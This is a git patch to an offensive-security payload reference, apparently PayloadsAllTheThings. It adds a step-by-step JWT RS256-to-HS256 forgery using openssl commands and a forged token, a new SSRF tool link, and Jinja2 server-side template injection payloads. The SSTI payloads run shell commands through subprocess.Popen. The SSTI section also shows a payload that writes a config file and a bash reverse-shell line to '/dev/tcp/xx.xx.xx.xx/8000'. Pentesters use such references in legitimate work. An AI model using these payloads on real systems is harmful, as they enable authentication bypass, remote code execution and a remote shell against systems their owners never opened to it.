From 05054af3439eaba68f8c87bd8c1414ee8c66717f Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 10 Jul 2019 20:58:50 +0200 Subject: [PATCH] JWT RS256 to HS256 using pubkey to generate a signature --- JSON Web Token/README.md | 48 +++++++++++++++++++++--- Server Side Request Forgery/README.md | 1 + Server Side Template Injection/README.md | 10 ++++- 3 files changed, 52 insertions(+), 7 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 3e88b887..c2f2e9e8 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -4,10 +4,15 @@ ## Summary -- JWT Format -- JWT Signature - None algorithm -- JWT Signature - RS256 to HS256 -- Breaking JWT's secret +- [Tools](#tools) +- [JWT Format](#jwt-format) +- [JWT Signature - None algorithm](#jwt-signature---none-algorithm) +- [JWT Signature - RS256 to HS256](#jwt-signature---rs256-to-hs256) +- [Breaking JWT's secret](#breaking-jwts-secret) + - [JWT Tool](#jwt-tool) + - [JWT cracker](#jwt-cracker) + - [Hashcat](#hashcat) +- [References](#references) ## Tools @@ -118,10 +123,40 @@ print public print jwt.encode({"data":"test"}, key=public, algorithm='HS256') ``` -Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version +:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version `pip install pyjwt==0.4.3`. +Here are the steps to edit an RS256 JWT token into an HS256 + +1. Convert our public key (key.pem) into HEX with this command. + + ```powershell + $ cat key.pem | xxd -p | tr -d "\\n" + 2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a + ``` + +2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited. + + ```powershell + $ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a + + (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 + ``` + +3. Convert signature (Hex to "base64 URL") + + ```powershell + $ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")" + ``` + +4. Add signature to edited payload + + ```powershell + [HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE] + eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA + ``` + ## Breaking JWT's secret Encode/Decode JWT with the secret. @@ -231,4 +266,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750) - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) -- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) \ No newline at end of file +- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) +- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index facf5a3e..9a7032a7 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -48,6 +48,7 @@ - [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) - [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) +- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF) ## Payloads with localhost diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 86c4113d..9c95d167 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -254,7 +254,14 @@ Listen for connexion nv -lnvp 8000 ``` -Inject this template +Exploit the SSTI by calling subprocess.Popen. +:warning: the number 396 will vary depending of the application. + +```python +{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +``` + +Exploit the SSTI by writing an evil file. ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config @@ -262,6 +269,7 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` + ### Filter bypass ```python